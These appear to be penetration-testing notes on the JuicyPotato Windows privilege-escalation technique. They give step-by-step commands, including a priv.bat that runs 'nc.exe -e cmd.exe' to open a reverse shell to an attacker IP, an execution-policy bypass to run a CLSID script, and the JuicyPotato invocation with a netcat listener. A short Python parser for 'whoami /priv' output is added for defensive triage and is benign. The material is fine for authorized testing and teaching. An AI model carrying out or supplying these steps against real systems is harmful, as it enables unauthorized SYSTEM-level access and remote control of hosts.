# Juicypotato

* Check whether ***SeImpersonatePrivilege*** or ***SeAssignPrimaryTokenPrivilege*** is enabled, using `whoami /priv` or `whoami /all`
* Requirements

  * Potato exe: <https://github.com/ohpe/juicy-potato/releases>. Note: there are other executables besides JuicyPotato (RottenPotato, SweetPotato, etc.) that can be used under certain circumstances: <https://jlajara.gitlab.io/Potatoes_Windows_Privesc>
  * Create priv.bat for the reverse privileged shell: `echo "C:\Windows\Tasks\nc.exe -e cmd.exe \<attacker ip> \<port>" > priv.bat`
  * Transfer nc.exe (on Kali it is at **/usr/share/windows-resources/binaries/nc.exe**)
  * Script **GetCLSID.ps1** for finding a **CLSID**: <https://ohpe.it/juicy-potato/CLSID/>. Run it with `powershell -executionpolicy bypass -file GetCLSID.ps1 > cls.txt`. Sometimes a CLSID is not required.

  Transfer all files to the Windows host.
* Exploit
  * `.\JuicyPotato.exe -p "C:\Windows\Tasks\priv.bat" -l 4444 -t * -c {653C5148-4DCE-4905-9CFD-1B23662D3D9E}` (-l is the listening port, the same as in priv.bat; -c is the CLSID)
  * nc -nvlp 4444
* References

  <https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505>

  <https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato>
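As an added defender-side example (not part of these notes), a small Python parser for `whoami /priv` output that reports which of the two token privileges from the check above the account actually holds; the sample output embedded below is constructed, not captured from a host. A privilege listed as Disabled is still held by the token and can be enabled by the process itself, so the check reports presence rather than state.

```python
import re

# Constructed sample of `whoami /priv` output for a service-style account
# (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# The two privileges the notes say to look for. Holding either one is the
# precondition the Potato family relies on, so an account that has them and
# runs untrusted code is the thing to flag.
TOKEN_ABUSE_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_whoami_priv(text):
    """Return {privilege_name: state} from the table printed by `whoami /priv`.

    Each data row is: <SeXxxPrivilege> <free-text description> <Enabled|Disabled>.
    Header and separator rows do not start with 'Se', so they are skipped.
    """
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def held_token_abuse_privileges(text):
    """Sorted names of the risky privileges present in the token, whatever their
    state. 'Disabled' only means not currently enabled; a process that holds the
    privilege can turn it on, so presence is what matters for triage."""
    privs = parse_whoami_priv(text)
    return sorted(p for p in TOKEN_ABUSE_PRIVILEGES if p in privs)


if __name__ == "__main__":
    for name, state in parse_whoami_priv(SAMPLE_WHOAMI_PRIV).items():
        print(f"{name:32} {state}")
    print("held token-abuse privileges:", held_token_abuse_privileges(SAMPLE_WHOAMI_PRIV))
```

Feed it real output saved from a host (`whoami /priv > priv.txt`) to triage which service accounts need their exposure reviewed.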
